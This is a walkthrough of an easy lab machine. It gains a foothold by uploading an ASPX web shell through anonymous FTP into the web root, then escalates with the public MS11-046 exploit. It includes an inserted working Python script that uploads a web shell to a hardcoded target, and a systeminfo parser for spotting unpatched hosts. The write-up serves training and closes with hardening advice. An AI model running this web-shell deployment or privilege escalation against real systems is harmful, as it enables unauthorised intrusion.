Introduction
The machine's rating leans slightly towards CVE-based exploitation, and it is rated easy. I am writing this blog as I solve it, to give an insight into my thought process while I try to get root on the machine. I will try to avoid Metasploit at all costs, because of the whole OSCP craze (the exam restricts its use).
Scanning & Enumeration
Target IP: 10.10.10.5
Nmap Command
FTP Enumeration
From the nmap results, we see that anonymous FTP login is allowed.

The files listed over FTP look like a web server's document root. Let's jump to HTTP to verify that; we can always come back later for FTP part 2 :P
HTTP Enumeration

This is the 'welcome.png' we saw in the FTP listing on the target machine.
So what I am thinking right now is that we may be able to upload a reverse shell over FTP and request it through the web app to get an initial foothold. But for that we need to know what web stack the server is running, so that we upload something it will actually execute.

To test this theory, we upload a test.html that displays a hello world and request it over HTTP.

And it works: the FTP root is the web root, so whatever we upload gets served by the web server.
Vulnerability Analysis
Let's talk about the vulnerability here.
It is a combination of FTP and the web server: anonymous FTP users can upload anything into the web server's root directory, and the server executes whatever lands there. Together, these two misconfigurations create the entry point.
Let’s go ahead and try to get our exploit ready and get that shell!
Exploitation
Let's quickly look up ASP.NET reverse shells.
Kali ships with some default web shells; one of them is at /usr/share/webshells/aspx/cmdasp.aspx.
- Copy this to the working directory
- Set up a netcat listener
- Upload the file to the target machine over FTP
- Request the uploaded file through the web interface
If everything goes well, we will now have a shell.
Oh, I forgot to add: we would need to update cmdasp.aspx to include our listening IP. Let's make it point number 1.5 :P
Looking at the source code …, wow, I made a mistake. It is a web shell, not a reverse shell (so it needs no listener or listening IP: commands go in through the page and the output comes back in the HTTP response).
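The upload-and-trigger procedure above, as an added example (not the author's or Kali's code): it first drops a file carrying a random marker over anonymous FTP and fetches it back over HTTP to confirm the FTP root really is the web root, and only then uploads the web shell. The host and URL (10.10.10.5 from this writeup) and the web shell path are assumptions; the random marker avoids a false positive from a cached or pre-existing page, and the upload/fetch functions are injected so the logic can be exercised without a network.

```python
"""Confirm an anonymous FTP root is the web root, then drop a web shell there.

Added example for this writeup; not the author's code.  Assumed values:
FTP_HOST / HTTP_BASE point at the target (10.10.10.5 in the writeup) and
WEBSHELL is Kali's /usr/share/webshells/aspx/cmdasp.aspx.
"""
import ftplib
import io
import secrets
import urllib.request
from pathlib import Path
from typing import Callable, Optional, Tuple

FTP_HOST = "10.10.10.5"                                   # assumed target
HTTP_BASE = "http://10.10.10.5/"                          # assumed web root URL
WEBSHELL = Path("/usr/share/webshells/aspx/cmdasp.aspx")  # Kali default web shell


def make_marker() -> str:
    """Random token so a cached or pre-existing page cannot give a false positive."""
    return secrets.token_hex(8)


def probe_webroot(upload: Callable[[str, bytes], None],
                  fetch: Callable[[str], bytes],
                  name: str = "test.html") -> Tuple[bool, str]:
    """Upload a marker file via `upload`, read it back via `fetch`.

    Returns (is_webroot, marker).  A fetch failure (404, connection error)
    counts as "not served" rather than crashing the probe.
    """
    marker = make_marker()
    upload(name, f"<html><body>hello world {marker}</body></html>".encode())
    try:
        body = fetch(name)
    except Exception:
        return False, marker
    return marker.encode() in body, marker


def ftp_upload(name: str, data: bytes, host: str = FTP_HOST) -> None:
    """Anonymous FTP upload into the server's root directory."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()  # ftplib defaults to anonymous / anonymous@
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def http_fetch(name: str, base: str = HTTP_BASE) -> bytes:
    """Plain GET of the uploaded file through the web server."""
    with urllib.request.urlopen(base + name, timeout=10) as resp:
        return resp.read()


def deploy_webshell(upload: Callable[[str, bytes], None],
                    fetch: Callable[[str], bytes],
                    shell_bytes: bytes,
                    remote_name: str = "cmdasp.aspx") -> Optional[str]:
    """Upload the web shell only after the web-root probe succeeds.

    Returns the URL to browse to, or None if the FTP root is not served.
    """
    ok, _ = probe_webroot(upload, fetch)
    if not ok:
        return None
    upload(remote_name, shell_bytes)
    return HTTP_BASE + remote_name


if __name__ == "__main__":
    url = deploy_webshell(ftp_upload, http_fetch, WEBSHELL.read_bytes())
    print("web shell at", url) if url else print("FTP root is not served over HTTP")
```

Because cmdasp.aspx is a web shell, no listener is needed; browsing to the returned URL gives the command form. Remember to delete test.html and the shell from the web root once you are done.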

We get our initial foothold on the machine. Let’s see what more we can get out of this.
Privesc
The initial user we get hold of is 'iis apppool\web', the IIS application pool identity, which is a low-privileged account.
I tried to access the user directories of babis and Administrator, but it seems we do not have access.
Let’s try to get some system info.

Since this is a web shell, the output is a little hard to read, so we simply ran dir && systeminfo.
And we get this output. Just in case you are wondering which error I am talking about, it's this one:

Moving on, it is Windows 7, and it looks like an older, unpatched build.
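Reading systeminfo output through a web shell is awkward, so here is an added example (not the author's code) that parses the pasted output and applies the check a practitioner wants at this point: is this an NT 5.1 to 6.1 box (XP through Windows 7 / 2008 R2) that is missing KB2503665, the update Microsoft shipped for MS11-046? The two SAMPLE strings are constructed, not the real output from the target, and the KB list holds only the original fix, so treat a hit as a hint to try the exploit, not proof: later afd.sys updates superseded that KB, and systeminfo sometimes reports no hotfixes at all.

```python
"""Parse `systeminfo` output and flag likely MS11-046 (afd.sys) candidates.

Added example for this writeup; not the author's code.  SAMPLE_RTM and
SAMPLE_PATCHED are constructed to look like systeminfo output and are not
the target's real output.
"""
import re
from typing import Dict, Optional, Set, Tuple

# KB2503665 is the update for MS11-046.  Later afd.sys updates supersede it,
# so an empty intersection is only a hint, not proof the box is vulnerable.
AFD_FIXES = {"KB2503665"}

# Constructed sample: a Windows 7 RTM box reporting no hotfixes.
SAMPLE_RTM = """\
Host Name:                 WIN7-RTM
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Constructed sample: Windows 7 SP1 with the afd.sys fix installed.
SAMPLE_PATCHED = """\
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB2503665
"""


def parse_systeminfo(text: str) -> Dict[str, str]:
    """Turn `Key:   value` lines into a dict; indented lines continue the last key."""
    info: Dict[str, str] = {}
    key: Optional[str] = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = re.match(r"^(\S[^:]*?):\s*(.*)$", raw)
        if m:
            key, value = m.group(1), m.group(2)
            info[key] = value
        elif key is not None:           # e.g. "[01]: KB976902" under Hotfix(s)
            info[key] += "\n" + raw.strip()
    return info


def os_version(info: Dict[str, str]) -> Optional[Tuple[int, int, int]]:
    """(major, minor, build) from the 'OS Version' field, or None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", info.get("OS Version", ""))
    return tuple(int(x) for x in m.groups()) if m else None


def hotfixes(info: Dict[str, str]) -> Set[str]:
    """All KB numbers listed under Hotfix(s); empty for 'N/A'."""
    return set(re.findall(r"KB\d+", info.get("Hotfix(s)", "")))


def ms11_046_candidate(info: Dict[str, str]) -> bool:
    """True for NT 5.1 - 6.1 (XP through 7 / 2008 R2) without the afd.sys fix."""
    ver = os_version(info)
    if ver is None:
        return False
    major, minor, _build = ver
    affected = (major == 5 and minor >= 1) or (major == 6 and minor <= 1)
    return affected and not (AFD_FIXES & hotfixes(info))


if __name__ == "__main__":
    for label, sample in (("rtm", SAMPLE_RTM), ("patched", SAMPLE_PATCHED)):
        info = parse_systeminfo(sample)
        print(label, info.get("OS Name"), os_version(info),
              "candidate" if ms11_046_candidate(info) else "not a candidate")
```

Paste the systeminfo text from the web shell into a file and feed it to parse_systeminfo; the same parser serves for other version-based privesc checks by swapping the KB set and version range.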

A Google search turns up a couple of results. One resource worth mentioning here is Rowbot's PenTest Notes; a simple Google search is enough to find it, but just in case: https://guide.offsecnewbie.com/

From Exploit-DB, we find this public exploit for local privilege escalation (MS11-046).
I thought it worth reviewing the code once before running it, so I will attach a few snippets here that I feel are worth sharing.


This installs mingw-w64, which gives us a GCC cross-compiler to build the exploit into a Windows exe.
It took a large amount of time for me!
Now let's compile the code with the command mentioned in the exploit.
When this is done, we can upload the exe; I have named mine root.exe.
Let's upload it to the FTP server again and execute it from our web shell!

Summary | TL;DR
- Scan ports using nmap
- Use FTP to upload an ASPX web shell, and trigger it through the web interface.
- The OS is vulnerable to MS11-046; exploit it, and BOOOM! ROOT!
Parting Thoughts
So after submitting all the user and root flags, I went ahead and read other writeups and solutions out there to see if I could have done things better.
- Instead of looking for an ASPX reverse shell, we could have generated our own with msfvenom (it can output ASPX payloads). I recommend watching ippsec's videos; they are really great.
This was a fairly simple box. The initial foothold could have been prevented by disabling anonymous FTP login (or at least not giving anonymous users write access to the web root), and the privesc by simply keeping the system updated.
Thank you for reading; please leave your feedback and share this with anyone who may need it. :)